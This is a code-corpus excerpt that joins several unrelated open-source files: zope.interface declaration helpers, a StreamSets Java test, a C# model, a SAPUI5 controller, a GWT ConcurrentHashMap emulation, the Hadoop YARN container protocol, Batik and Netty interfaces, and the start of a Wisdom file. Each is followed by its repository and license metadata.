unless implementsOnly was used.
This function is provided for convenience. It provides a more
convenient way to call classImplements. For example::
implements(I1)
is equivalent to calling::
classImplements(C, I1)
after the class has been created.
"""
# This entire approach is invalid under Py3K. Don't even try to fix
# the coverage for this block there. :(
if PYTHON3:
raise TypeError(_ADVICE_ERROR % 'implementer')
_implements("implements", interfaces, classImplements)
def implementsOnly(*interfaces):
"""Declare the only interfaces implemented by instances of a class
This function is called in a class definition.
The arguments are one or more interfaces or interface
specifications (IDeclaration objects).
Previous declarations including declarations for base classes
are overridden.
This function is provided for convenience. It provides a more
convenient way to call classImplementsOnly. For example::
implementsOnly(I1)
is equivalent to calling::
classImplementsOnly(I1)
after the class has been created.
"""
# This entire approach is invalid under Py3K. Don't even try to fix
# the coverage for this block there. :(
if PYTHON3:
raise TypeError(_ADVICE_ERROR % 'implementer_only')
_implements("implementsOnly", interfaces, classImplementsOnly)
##############################################################################
#
# Instance declarations
class Provides(Declaration): # Really named ProvidesClass
"""Implement __provides__, the instance-specific specification
When an object is pickled, we pickle the interfaces that it implements.
"""
def __init__(self, cls, *interfaces):
self.__args = (cls, ) + interfaces
self._cls = cls
Declaration.__init__(self, *(interfaces + (implementedBy(cls), )))
def __reduce__(self):
return Provides, self.__args
__module__ = 'zope.interface'
def __get__(self, inst, cls):
"""Make sure that a class __provides__ doesn't leak to an instance
"""
if inst is None and cls is self._cls:
# We were accessed through a class, so we are the class'
# provides spec. Just return this object, but only if we are
# being called on the same class that we were defined for:
return self
raise AttributeError('__provides__')
ProvidesClass = Provides
# Registry of instance declarations
# This is a memory optimization to allow objects to share specifications.
InstanceDeclarations = weakref.WeakValueDictionary()
def Provides(*interfaces):
"""Cache instance declarations
Instance declarations are shared among instances that have the same
declaration. The declarations are cached in a weak value dictionary.
"""
spec = InstanceDeclarations.get(interfaces)
if spec is None:
spec = ProvidesClass(*interfaces)
InstanceDeclarations[interfaces] = spec
return spec
Provides.__safe_for_unpickling__ = True
def directlyProvides(object, *interfaces):
"""Declare interfaces declared directly for an object
The arguments after the object are one or more interfaces or interface
specifications (``IDeclaration`` objects).
The interfaces given (including the interfaces in the specifications)
replace interfaces previously declared for the object.
"""
cls = getattr(object, '__class__', None)
if cls is not None and getattr(cls, '__class__', None) is cls:
# It's a meta class (well, at least it it could be an extension class)
# Note that we can't get here from Py3k tests: there is no normal
# class which isn't descriptor aware.
if not isinstance(object,
DescriptorAwareMetaClasses):
raise TypeError("Attempt to make an interface declaration on a "
"non-descriptor-aware class")
interfaces = _normalizeargs(interfaces)
if cls is None:
cls = type(object)
issub = False
for damc in DescriptorAwareMetaClasses:
if issubclass(cls, damc):
issub = True
break
if issub:
# we have a class or type. We'll use a special descriptor
# that provides some extra caching
object.__provides__ = ClassProvides(object, cls, *interfaces)
else:
object.__provides__ = Provides(cls, *interfaces)
def alsoProvides(object, *interfaces):
"""Declare interfaces declared directly for an object
The arguments after the object are one or more interfaces or interface
specifications (``IDeclaration`` objects).
The interfaces given (including the interfaces in the specifications) are
added to the interfaces previously declared for the object.
"""
directlyProvides(object, directlyProvidedBy(object), *interfaces)
def noLongerProvides(object, interface):
""" Removes a directly provided interface from an object.
"""
directlyProvides(object, directlyProvidedBy(object) - interface)
if interface.providedBy(object):
raise ValueError("Can only remove directly provided interfaces.")
class ClassProvidesBaseFallback(object):
def __get__(self, inst, cls):
if cls is self._cls:
# We only work if called on the class we were defined for
if inst is None:
# We were accessed through a class, so we are the class'
# provides spec. Just return this object as is:
return self
return self._implements
raise AttributeError('__provides__')
ClassProvidesBasePy = ClassProvidesBaseFallback # BBB
ClassProvidesBase = ClassProvidesBaseFallback
# Try to get C base:
try:
from ._zope_interface_coptimizations import ClassProvidesBase
except ImportError:
pass
class ClassProvides(Declaration, ClassProvidesBase):
"""Special descriptor for class __provides__
The descriptor caches the implementedBy info, so that
we can get declarations for objects without instance-specific
interfaces a bit quicker.
"""
def __init__(self, cls, metacls, *interfaces):
self._cls = cls
self._implements = implementedBy(cls)
self.__args = (cls, metacls, ) + interfaces
Declaration.__init__(self, *(interfaces + (implementedBy(metacls), )))
def __reduce__(self):
return self.__class__, self.__args
# Copy base-class method for speed
__get__ = ClassProvidesBase.__get__
def directlyProvidedBy(object):
"""Return the interfaces directly provided by the given object
The value returned is an ``IDeclaration``.
"""
provides = getattr(object, "__provides__", None)
if (provides is None # no spec
or
# We might have gotten the implements spec, as an
# optimization. If so, it's like having only one base, that we
# lop off to exclude class-supplied declarations:
isinstance(provides, Implements)
):
return _empty
# Strip off the class part of the spec:
return Declaration(provides.__bases__[:-1])
def classProvides(*interfaces):
"""Declare interfaces provided directly by a class
This function is called in a class definition.
The arguments are one or more interfaces or interface specifications
(``IDeclaration`` objects).
The given interfaces (including the interfaces in the specifications)
are used to create the class's direct-object interface specification.
An error will be raised if the module class has an direct interface
specification. In other words, it is an error to call this function more
than once in a class definition.
Note that the given interfaces have nothing to do with the interfaces
implemented by instances of the class.
This function is provided for convenience. It provides a more convenient
way to call directlyProvides for a class. For example::
classProvides(I1)
is equivalent to calling::
directlyProvides(theclass, I1)
after the class has been created.
"""
# This entire approach is invalid under Py3K. Don't even try to fix
# the coverage for this block there. :(
if PYTHON3:
raise TypeError(_ADVICE_ERROR % 'provider')
frame = sys._getframe(1)
locals = frame.f_locals
# Try to make sure we were called from a class def
if (locals is frame.f_globals) or ('__module__' not in locals):
raise TypeError("classProvides can be used only from a "
"class definition.")
if '__provides__' in locals:
raise TypeError(
"classProvides can only be used once in a class definition.")
locals["__provides__"] = _normalizeargs(interfaces)
advicemod.addClassAdvisor(_classProvides_advice, depth=2)
def _classProvides_advice(cls):
# This entire approach is invalid under Py3K. Don't even try to fix
# the coverage for this block there. :(
interfaces = cls.__dict__['__provides__']
del cls.__provides__
directlyProvides(cls, *interfaces)
return cls
class provider:
"""Class decorator version of classProvides"""
def __init__(self, *interfaces):
self.interfaces = interfaces
def __call__(self, ob):
directlyProvides(ob, *self.interfaces)
return ob
def moduleProvides(*interfaces):
"""Declare interfaces provided by a module
This function is used in a module definition.
The arguments are one or more interfaces or interface specifications
(``IDeclaration`` objects).
The given interfaces (including the interfaces in the specifications) are
used to create the module's direct-object interface specification. An
error will be raised if the module already has an interface specification.
In other words, it is an error to call this function more than once in a
module definition.
This function is provided for convenience. It provides a more convenient
way to call directlyProvides. For example::
moduleImplements(I1)
is equivalent to::
directlyProvides(sys.modules[__name__], I1)
"""
frame = sys._getframe(1)
locals = frame.f_locals
# Try to make sure we were called from a class def
if (locals is not frame.f_globals) or ('__name__' not in locals):
raise TypeError(
"moduleProvides can only be used from a module definition.")
if '__provides__' in locals:
raise TypeError(
"moduleProvides can only be used once in a module definition.")
locals["__provides__"] = Provides(ModuleType,
*_normalizeargs(interfaces))
##############################################################################
#
# Declaration querying support
# XXX: is this a fossil? Nobody calls it, no unit tests exercise it, no
# doctests import it, and the package __init__ doesn't import it.
def ObjectSpecification(direct, cls):
"""Provide object specifications
These combine information for the object and for it's classes.
"""
return Provides(cls, direct) # pragma: no cover fossil
def getObjectSpecificationFallback(ob):
provides = getattr(ob, '__provides__', None)
if provides is not None:
if isinstance(provides, SpecificationBase):
return provides
try:
cls = ob.__class__
except AttributeError:
# We can't get the class, so just consider provides
return _empty
return implementedBy(cls)
getObjectSpecification = getObjectSpecificationFallback
def providedByFallback(ob):
# Here we have either a special object, an old-style declaration
# or a descriptor
# Try to get __providedBy__
try:
r = ob.__providedBy__
except AttributeError:
# Not set yet. Fall back to lower-level thing that computes it
return getObjectSpecification(ob)
try:
# We might have gotten a descriptor from an instance of a
# class (like an ExtensionClass) that doesn't support
# descriptors. We'll make sure we got one by trying to get
# the only attribute, which all specs have.
r.extends
except AttributeError:
# The object's class doesn't understand descriptors.
# Sigh. We need to get an object descriptor, but we have to be
# careful. We want to use the instance's __provides__, if
# there is one, but only if it didn't come from the class.
try:
r = ob.__provides__
except AttributeError:
# No __provides__, so just fall back to implementedBy
return implementedBy(ob.__class__)
# We need to make sure we got the __provides__ from the
# instance. We'll do this by making sure we don't get the same
# thing from the class:
try:
cp = ob.__class__.__provides__
except AttributeError:
# The ob doesn't have a class or the class has no
# provides, assume we're done:
return r
if r is cp:
# Oops, we got the provides from the class. This means
# the object doesn't have it's own. We should use implementedBy
return implementedBy(ob.__class__)
return r
providedBy = providedByFallback
class ObjectSpecificationDescriptorFallback(object):
"""Implement the `__providedBy__` attribute
The `__providedBy__` attribute computes the interfaces peovided by
an object.
"""
def __get__(self, inst, cls):
"""Get an object specification for an object
"""
if inst is None:
return getObjectSpecification(cls)
provides = getattr(inst, '__provides__', None)
if provides is not None:
return provides
return implementedBy(cls)
ObjectSpecificationDescriptor = ObjectSpecificationDescriptorFallback
##############################################################################
def _normalizeargs(sequence, output = None):
"""Normalize declaration arguments
Normalization arguments might contain Declarions, tuples, or single
interfaces.
Anything but individial interfaces or implements specs will be expanded.
"""
if output is None:
output = []
cls = sequence.__class__
if InterfaceClass in cls.__mro__ or Implements in cls.__mro__:
output.append(sequence)
else:
for v in sequence:
_normalizeargs(v, output)
return output
_empty = Declaration()
try:
from ._zope_interface_coptimizations import (
getObjectSpecification,
implementedBy,
ObjectSpecificationDescriptor,
providedBy,
)
except ImportError:
pass
objectSpecificationDescriptor = ObjectSpecificationDescriptor()
| smmribeiro/intellij-community | plugins/hg4idea/testData/bin/mercurial/thirdparty/zope/interface/declarations.py | Python | apache-2.0 | 30,880 |
/*
* Copyright 2017 StreamSets Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.streamsets.datacollector.restapi.bean;
import com.streamsets.datacollector.restapi.bean.ConfigConfigurationJson;
import com.streamsets.pipeline.api.Config;
import org.junit.Assert;
import org.junit.Test;
public class TestConfigConfigurationBean {
@Test(expected = NullPointerException.class)
public void testConfigConfigurationBeanNull() {
ConfigConfigurationJson configConfigurationJsonBean =
new ConfigConfigurationJson(null);
}
@Test
public void testConfigConfigurationBean() {
Config config =
new Config("url", "http://localhost:9090");
ConfigConfigurationJson configConfigurationJsonBean =
new ConfigConfigurationJson(config);
Assert.assertEquals(config.getName(), configConfigurationJsonBean.getName());
Assert.assertEquals(config.getValue(), configConfigurationJsonBean.getValue());
Assert.assertEquals(config.getName(), configConfigurationJsonBean.getConfigConfiguration().getName());
Assert.assertEquals(config.getValue(), configConfigurationJsonBean.getConfigConfiguration().getValue());
}
@Test
public void testConfigConfigurationBeanConstructorWithArgs() {
Config config =
new Config("url", "http://localhost:9090");
ConfigConfigurationJson configConfigurationJsonBean =
new ConfigConfigurationJson("url", "http://localhost:9090");
Assert.assertEquals(config.getName(), configConfigurationJsonBean.getName());
Assert.assertEquals(config.getValue(), configConfigurationJsonBean.getValue());
Assert.assertEquals(config.getName(), configConfigurationJsonBean.getConfigConfiguration().getName());
Assert.assertEquals(config.getValue(), configConfigurationJsonBean.getConfigConfiguration().getValue());
}
}
| rockmkd/datacollector | container/src/test/java/com/streamsets/datacollector/restapi/bean/TestConfigConfigurationBean.java | Java | apache-2.0 | 2,338 |
using System;
namespace Benchmarks.Models
{
public class User
{
public Guid Id { get; set; }
public string UserName { get; set; }
public string Email { get; set; }
public int Age { get; set; }
public string Address { get; set; }
public bool Active { get; set; }
public bool Deleted { get; set; }
public DateTime CreatedOn { get; set; }
public Role Role { get; set; }
}
}
| Excommunicated/ExpressMapper | PerformanceTest/Models/User.cs | C# | apache-2.0 | 460 |
var DOCUMENTATION_OPTIONS = {
URL_ROOT: document.getElementById("documentation_options").getAttribute('data-url_root'),
VERSION: '5.3.4',
LANGUAGE: 'None',
COLLAPSE_INDEX: false,
FILE_SUFFIX: '.html',
HAS_SOURCE: true,
SOURCELINK_SUFFIX: '.txt'
}; | tst-eclamar/earthenterprise | docs/geedocs/5.3.4/static/documentation_options.js | JavaScript | apache-2.0 | 275 |
/*
* Copyright (C) 2009 The Guava Authors
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package java.util.concurrent;
import java.util.AbstractMap;
import java.util.Collections;
import java.util.Enumeration;
import java.util.HashMap;
import java.util.Map;
import java.util.Set;
/**
* Minimal emulation of {@link java.util.concurrent.ConcurrentHashMap}.
* Note that the javascript interpreter is <a
* href="http://code.google.com/docreader/#p=google-web-toolkit-doc-1-5&t=DevGuideJavaCompatibility">
* single-threaded</a>, it is essentially a {@link java.util.HashMap},
* implementing the new methods introduced by {@link ConcurrentMap}.
*
* @author Hayward Chan
*/
public class ConcurrentHashMap<K, V>
extends AbstractMap<K, V> implements ConcurrentMap<K, V> {
private final Map<K, V> backingMap;
public ConcurrentHashMap() {
this.backingMap = new HashMap<K, V>();
}
public ConcurrentHashMap(int initialCapacity) {
this.backingMap = new HashMap<K, V>(initialCapacity);
}
public ConcurrentHashMap(int initialCapacity, float loadFactor) {
this.backingMap = new HashMap<K, V>(initialCapacity, loadFactor);
}
public ConcurrentHashMap(Map<? extends K, ? extends V> t) {
this.backingMap = new HashMap<K, V>(t);
}
public V putIfAbsent(K key, V value) {
if (!containsKey(key)) {
return put(key, value);
} else {
return get(key);
}
}
public boolean remove(Object key, Object value) {
if (containsKey(key) && get(key).equals(value)) {
remove(key);
return true;
} else {
return false;
}
}
public boolean replace(K key, V oldValue, V newValue) {
if (oldValue == null || newValue == null) {
throw new NullPointerException();
} else if (containsKey(key) && get(key).equals(oldValue)) {
put(key, newValue);
return true;
} else {
return false;
}
}
public V replace(K key, V value) {
if (value == null) {
throw new NullPointerException();
} else if (containsKey(key)) {
return put(key, value);
} else {
return null;
}
}
@Override public boolean containsKey(Object key) {
if (key == null) {
throw new NullPointerException();
}
return backingMap.containsKey(key);
}
@Override public V get(Object key) {
if (key == null) {
throw new NullPointerException();
}
return backingMap.get(key);
}
@Override public V put(K key, V value) {
if (key == null || value == null) {
throw new NullPointerException();
}
return backingMap.put(key, value);
}
@Override public boolean containsValue(Object value) {
if (value == null) {
throw new NullPointerException();
}
return backingMap.containsValue(value);
}
@Override public V remove(Object key) {
if (key == null) {
throw new NullPointerException();
}
return backingMap.remove(key);
}
@Override public Set<Entry<K, V>> entrySet() {
return backingMap.entrySet();
}
public boolean contains(Object value) {
return containsValue(value);
}
public Enumeration<V> elements() {
return Collections.enumeration(values());
}
public Enumeration<K> keys() {
return Collections.enumeration(keySet());
}
}
| rgoldberg/guava | guava-gwt/src-super/java/util/super/java/util/concurrent/ConcurrentHashMap.java | Java | apache-2.0 | 3,773 |
sap.ui.define(['sap/ui/core/mvc/Controller'],
function(Controller) {
"use strict";
var MBController = Controller.extend("sap.m.sample.MenuButton.MB", {
onDefaultAction: function() {
sap.m.MessageToast.show("Default action triggered");
},
onDefaultActionAccept: function() {
sap.m.MessageToast.show("Accepted");
},
onMenuAction: function(oEvent) {
var oItem = oEvent.getParameter("item"),
sItemPath = "";
while (oItem instanceof sap.m.MenuItem) {
sItemPath = oItem.getText() + " > " + sItemPath;
oItem = oItem.getParent();
}
sItemPath = sItemPath.substr(0, sItemPath.lastIndexOf(" > "));
sap.m.MessageToast.show("Action triggered on item: " + sItemPath);
}
});
return MBController;
}); | openui5/packaged-sap.m | test-resources/sap/m/demokit/sample/MenuButton/MB.controller.js | JavaScript | apache-2.0 | 760 |
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.yarn.api;
import java.io.IOException;
import org.apache.hadoop.classification.InterfaceAudience.Public;
import org.apache.hadoop.classification.InterfaceStability.Stable;
import org.apache.hadoop.classification.InterfaceStability.Unstable;
import org.apache.hadoop.yarn.api.protocolrecords.CommitResponse;
import org.apache.hadoop.yarn.api.protocolrecords.IncreaseContainersResourceRequest;
import org.apache.hadoop.yarn.api.protocolrecords.IncreaseContainersResourceResponse;
import org.apache.hadoop.yarn.api.protocolrecords.GetContainerStatusesRequest;
import org.apache.hadoop.yarn.api.protocolrecords.GetContainerStatusesResponse;
import org.apache.hadoop.yarn.api.protocolrecords.ReInitializeContainerRequest;
import org.apache.hadoop.yarn.api.protocolrecords.ReInitializeContainerResponse;
import org.apache.hadoop.yarn.api.protocolrecords.ResourceLocalizationRequest;
import org.apache.hadoop.yarn.api.protocolrecords.ResourceLocalizationResponse;
import org.apache.hadoop.yarn.api.protocolrecords.RestartContainerResponse;
import org.apache.hadoop.yarn.api.protocolrecords.RollbackResponse;
import org.apache.hadoop.yarn.api.protocolrecords.SignalContainerRequest;
import org.apache.hadoop.yarn.api.protocolrecords.SignalContainerResponse;
import org.apache.hadoop.yarn.api.protocolrecords.StartContainerRequest;
import org.apache.hadoop.yarn.api.protocolrecords.StartContainersRequest;
import org.apache.hadoop.yarn.api.protocolrecords.StartContainersResponse;
import org.apache.hadoop.yarn.api.protocolrecords.StopContainersRequest;
import org.apache.hadoop.yarn.api.protocolrecords.StopContainersResponse;
import org.apache.hadoop.yarn.api.records.Container;
import org.apache.hadoop.yarn.api.records.ContainerId;
import org.apache.hadoop.yarn.api.records.ContainerLaunchContext;
import org.apache.hadoop.yarn.api.records.ContainerStatus;
import org.apache.hadoop.yarn.exceptions.NMNotYetReadyException;
import org.apache.hadoop.yarn.exceptions.YarnException;
/**
* <p>The protocol between an <code>ApplicationMaster</code> and a
* <code>NodeManager</code> to start/stop and increase resource of containers
* and to get status of running containers.</p>
*
* <p>If security is enabled the <code>NodeManager</code> verifies that the
* <code>ApplicationMaster</code> has truly been allocated the container
* by the <code>ResourceManager</code> and also verifies all interactions such
* as stopping the container or obtaining status information for the container.
* </p>
*/
@Public
@Stable
public interface ContainerManagementProtocol {
/**
* <p>
* The <code>ApplicationMaster</code> provides a list of
* {@link StartContainerRequest}s to a <code>NodeManager</code> to
* <em>start</em> {@link Container}s allocated to it using this interface.
* </p>
*
* <p>
* The <code>ApplicationMaster</code> has to provide details such as allocated
* resource capability, security tokens (if enabled), command to be executed
* to start the container, environment for the process, necessary
* binaries/jar/shared-objects etc. via the {@link ContainerLaunchContext} in
* the {@link StartContainerRequest}.
* </p>
*
* <p>
* The <code>NodeManager</code> sends a response via
* {@link StartContainersResponse} which includes a list of
* {@link Container}s of successfully launched {@link Container}s, a
* containerId-to-exception map for each failed {@link StartContainerRequest} in
* which the exception indicates errors from per container and a
* allServicesMetaData map between the names of auxiliary services and their
* corresponding meta-data. Note: None-container-specific exceptions will
* still be thrown by the API method itself.
* </p>
* <p>
* The <code>ApplicationMaster</code> can use
* {@link #getContainerStatuses(GetContainerStatusesRequest)} to get updated
* statuses of the to-be-launched or launched containers.
* </p>
*
* @param request
* request to start a list of containers
* @return response including conatinerIds of all successfully launched
* containers, a containerId-to-exception map for failed requests and
* a allServicesMetaData map.
* @throws YarnException
* @throws IOException
* @throws NMNotYetReadyException
* This exception is thrown when NM starts from scratch but has not
* yet connected with RM.
*/
@Public
@Stable
StartContainersResponse startContainers(StartContainersRequest request)
throws YarnException, IOException;
/**
* <p>
* The <code>ApplicationMaster</code> requests a <code>NodeManager</code> to
* <em>stop</em> a list of {@link Container}s allocated to it using this
* interface.
* </p>
*
* <p>
* The <code>ApplicationMaster</code> sends a {@link StopContainersRequest}
* which includes the {@link ContainerId}s of the containers to be stopped.
* </p>
*
* <p>
* The <code>NodeManager</code> sends a response via
* {@link StopContainersResponse} which includes a list of {@link ContainerId}
* s of successfully stopped containers, a containerId-to-exception map for
* each failed request in which the exception indicates errors from per
* container. Note: None-container-specific exceptions will still be thrown by
* the API method itself. <code>ApplicationMaster</code> can use
* {@link #getContainerStatuses(GetContainerStatusesRequest)} to get updated
* statuses of the containers.
* </p>
*
* @param request
* request to stop a list of containers
* @return response which includes a list of containerIds of successfully
* stopped containers, a containerId-to-exception map for failed
* requests.
* @throws YarnException
* @throws IOException
*/
@Public
@Stable
StopContainersResponse stopContainers(StopContainersRequest request)
throws YarnException, IOException;
/**
* <p>
* The API used by the <code>ApplicationMaster</code> to request for current
* statuses of <code>Container</code>s from the <code>NodeManager</code>.
* </p>
*
* <p>
* The <code>ApplicationMaster</code> sends a
* {@link GetContainerStatusesRequest} which includes the {@link ContainerId}s
* of all containers whose statuses are needed.
* </p>
*
* <p>
* The <code>NodeManager</code> responds with
* {@link GetContainerStatusesResponse} which includes a list of
* {@link ContainerStatus} of the successfully queried containers and a
* containerId-to-exception map for each failed request in which the exception
* indicates errors from per container. Note: None-container-specific
* exceptions will still be thrown by the API method itself.
* </p>
*
* @param request
* request to get <code>ContainerStatus</code>es of containers with
* the specified <code>ContainerId</code>s
* @return response containing the list of <code>ContainerStatus</code> of the
* successfully queried containers and a containerId-to-exception map
* for failed requests.
*
* @throws YarnException
* @throws IOException
*/
@Public
@Stable
GetContainerStatusesResponse getContainerStatuses(
GetContainerStatusesRequest request) throws YarnException,
IOException;
/**
* <p>
* The API used by the <code>ApplicationMaster</code> to request for
* resource increase of running containers on the <code>NodeManager</code>.
* </p>
*
* @param request
* request to increase resource of a list of containers
* @return response which includes a list of containerIds of containers
* whose resource has been successfully increased and a
* containerId-to-exception map for failed requests.
*
* @throws YarnException
* @throws IOException
*/
@Public
@Unstable
IncreaseContainersResourceResponse increaseContainersResource(
IncreaseContainersResourceRequest request) throws YarnException,
IOException;
SignalContainerResponse signalToContainer(SignalContainerRequest request)
throws YarnException, IOException;
/**
* Localize resources required by the container.
* Currently, this API only works for running containers.
*
* @param request Specify the resources to be localized.
* @return Response that the localize request is accepted.
* @throws YarnException Exception specific to YARN
* @throws IOException IOException thrown from the RPC layer.
*/
@Public
@Unstable
ResourceLocalizationResponse localize(ResourceLocalizationRequest request)
throws YarnException, IOException;
/**
* ReInitialize the Container with a new Launch Context.
* @param request Specify the new ContainerLaunchContext.
* @return Response that the ReInitialize request is accepted.
* @throws YarnException Exception specific to YARN.
* @throws IOException IOException thrown from the RPC layer.
*/
@Public
@Unstable
ReInitializeContainerResponse reInitializeContainer(
ReInitializeContainerRequest request) throws YarnException, IOException;
/**
* Restart the container.
* @param containerId Container Id.
* @return Response that the restart request is accepted.
* @throws YarnException Exception specific to YARN.
* @throws IOException IOException thrown from the RPC layer.
*/
@Public
@Unstable
RestartContainerResponse restartContainer(ContainerId containerId)
throws YarnException, IOException;
/**
* Rollback the Last ReInitialization if possible.
* @param containerId Container Id.
* @return Response that the rollback request is accepted.
* @throws YarnException Exception specific to YARN.
* @throws IOException IOException thrown from the RPC layer.
*/
@Public
@Unstable
RollbackResponse rollbackLastReInitialization(ContainerId containerId)
throws YarnException, IOException;
/**
* Commit the Last ReInitialization if possible. Once the reinitialization
* has been committed, It cannot be rolled back.
* @param containerId Container Id.
* @return Response that the commit request is accepted.
* @throws YarnException Exception specific to YARN.
* @throws IOException IOException thrown from the RPC layer.
*/
@Public
@Unstable
CommitResponse commitLastReInitialization(ContainerId containerId)
throws YarnException, IOException;
}
| WIgor/hadoop | hadoop-yarn-project/hadoop-yarn/hadoop-yarn-api/src/main/java/org/apache/hadoop/yarn/api/ContainerManagementProtocol.java | Java | apache-2.0 | 11,258 |
/*
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package org.apache.batik.anim.timing;
/**
* An adapter class for {@link TimegraphListener}s.
*
* @author <a href="mailto:cam%40mcc%2eid%2eau">Cameron McCormack</a>
* @version $Id: TimegraphAdapter.java 475477 2006-11-15 22:44:28Z cam $
*/
public class TimegraphAdapter implements TimegraphListener {
/**
* Invoked to indicate that a timed element has been added to the
* document.
*/
public void elementAdded(TimedElement e) {
}
/**
* Invoked to indicate that a timed element has been removed from the
* document.
*/
public void elementRemoved(TimedElement e) {
}
/**
* Invoked to indicate that a timed element has become active.
* @param e the TimedElement that became active
* @param t the time (in parent simple time) that the element became active
*/
public void elementActivated(TimedElement e, float t) {
}
/**
* Invoked to indicate that a timed element has become inactive
* and is filling.
*/
public void elementFilled(TimedElement e, float t) {
}
/**
* Invoked to indicate that a timed element has become inactive
* and is not filling.
*/
public void elementDeactivated(TimedElement e, float t) {
}
/**
* Invoked to indivate that an interval was created for the given
* timed element.
*/
public void intervalCreated(TimedElement e, Interval i) {
}
/**
* Invoked to indivate that an interval was removed for the given
* timed element.
*/
public void intervalRemoved(TimedElement e, Interval i) {
}
/**
* Invoked to indivate that an interval's endpoints were changed.
*/
public void intervalChanged(TimedElement e, Interval i) {
}
/**
* Invoked to indivate that the given interval began.
* @param i the Interval that began, or null if no interval is
* active for the given timed element.
*/
public void intervalBegan(TimedElement e, Interval i) {
}
/**
* Invoked to indicate that the given timed element began a repeat
* iteration at the specified time.
*/
public void elementRepeated(TimedElement e, int i, float t) {
}
/**
* Invoked to indicate that the list of instance times for the given
* timed element has been updated.
*/
public void elementInstanceTimesChanged(TimedElement e, float isBegin) {
}
}
| sflyphotobooks/crp-batik | sources/org/apache/batik/anim/timing/TimegraphAdapter.java | Java | apache-2.0 | 3,242 |
/*
* Copyright 2012 The Netty Project
*
* The Netty Project licenses this file to you under the Apache License,
* version 2.0 (the "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at:
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations
* under the License.
*/
package org.jboss.netty.channel.core;
import java.io.IOException;
import java.nio.channels.FileChannel;
import java.nio.channels.WritableByteChannel;
import org.jboss.netty.util.ExternalResourceReleasable;
/**
* A region of a file that is sent via a {@link Channel} which supports
* <a href="http://en.wikipedia.org/wiki/Zero-copy">zero-copy file transfer</a>.
*
* <h3>Upgrade your JDK / JRE</h3>
*
* {@link FileChannel#transferTo(long, long, WritableByteChannel)} has at least
* four known bugs in the old versions of Sun JDK and perhaps its derived ones.
* Please upgrade your JDK to 1.6.0_18 or later version if you are going to use
* zero-copy file transfer.
* <ul>
* <li><a href="http://bugs.sun.com/bugdatabase/view_bug.do?bug_id=5103988">5103988</a>
* - FileChannel.transferTo() should return -1 for EAGAIN instead throws IOException</li>
* <li><a href="http://bugs.sun.com/bugdatabase/view_bug.do?bug_id=6253145">6253145</a>
* - FileChannel.transferTo() on Linux fails when going beyond 2GB boundary</li>
* <li><a href="http://bugs.sun.com/bugdatabase/view_bug.do?bug_id=6427312">6427312</a>
* - FileChannel.transferTo() throws IOException "system call interrupted"</li>
* <li><a href="http://bugs.sun.com/bugdatabase/view_bug.do?bug_id=6524172">6470086</a>
* - FileChannel.transferTo(2147483647, 1, channel) causes "Value too large" exception</li>
* </ul>
*
* <h3>Check your operating system and JDK / JRE</h3>
*
* If your operating system (or JDK / JRE) does not support zero-copy file
* transfer, sending a file with {@link FileRegion} might fail or yield worse
* performance. For example, sending a large file doesn't work well in Windows.
*
* <h3>Not all transports support it</h3>
*
* Currently, the NIO transport is the only transport that supports {@link FileRegion}.
* Attempting to write a {@link FileRegion} to non-NIO {@link Channel} will trigger
* a {@link ClassCastException} or a similar exception.
*/
public interface FileRegion extends ExternalResourceReleasable {
// FIXME Make sure all transports support writing a FileRegion
// Even if zero copy cannot be achieved, all transports should emulate it.
/**
* Returns the offset in the file where the transfer began.
*/
long getPosition();
/**
* Returns the number of bytes to transfer.
*/
long getCount();
/**
* Transfers the content of this file region to the specified channel.
*
* @param target the destination of the transfer
* @param position the relative offset of the file where the transfer
* begins from. For example, <tt>0</tt> will make the
* transfer start from {@link #getPosition()}th byte and
* <tt>{@link #getCount()} - 1</tt> will make the last
* byte of the region transferred.
*/
long transferTo(WritableByteChannel target, long position) throws IOException;
}
| xiexingguang/simple-netty-source | src/main/java/org/jboss/netty/channel/core/FileRegion.java | Java | apache-2.0 | 3,614 |
/*
* #%L
* Wisdom-Framework
* %%
* Copyright (C) 2013 - 2014 Wisdom Framework
* %%
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
* #L%
*/
package org.wisdom.content.bodyparsers;
import com.google.common.collect.ImmutableList;
import org.apache.felix.ipojo.annotations.Component;
